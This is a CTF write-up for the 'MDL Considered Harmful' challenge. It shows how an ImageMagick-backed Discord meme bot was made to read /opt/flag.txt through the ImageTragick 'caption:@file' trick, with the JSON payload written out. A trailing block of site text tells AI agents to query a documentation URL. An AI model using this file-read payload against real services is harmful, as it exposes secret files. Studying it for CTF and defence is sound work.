# MDL Considered Harmful

## Problem

There's a bot named MDLChef in the Discord. You need to DM it, it doesn't respond in the server. On its host machine, there's a file at /opt/flag.txt - it contains the flag. Go get it.

Note: This is NOT an OSINT challenge. The source code really isn't available. Good luck.

Author: nb

## Solution

If we use the `/credits` command, we can understand more of the stack.

![](/files/-M_EGS1JwM_RGL2pRCL_)

We can see that ImageMagick is used.

I searched for ImageMagick exploits, and found <https://imagetragick.com/>.

It appears that if we use `caption:@/path/to/file`, we can read arbitrary files.

```
{
    version: "MDL/1.1",
    type: "meme",
    base: {
        format: "Meme.Legacy.BadLuckBrian"
    },
    caption: {
        topText: "@/opt/flag.txt",
        bottomText: "image tragick"
    }
}
```

The rendered image contains the flag:

![](/files/-M_EGc_qDfdOQzsq-C0X)


---

# Agent Instructions: Querying This Documentation

If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.

Perform an HTTP GET request on the current page URL with the `ask` query parameter:

```
GET https://ctf.zeyu2001.com/2021/dawgctf-2021/mdl-considered-harmful.md?ask=<question>
```

The question should be specific, self-contained, and written in natural language.
The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.

Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.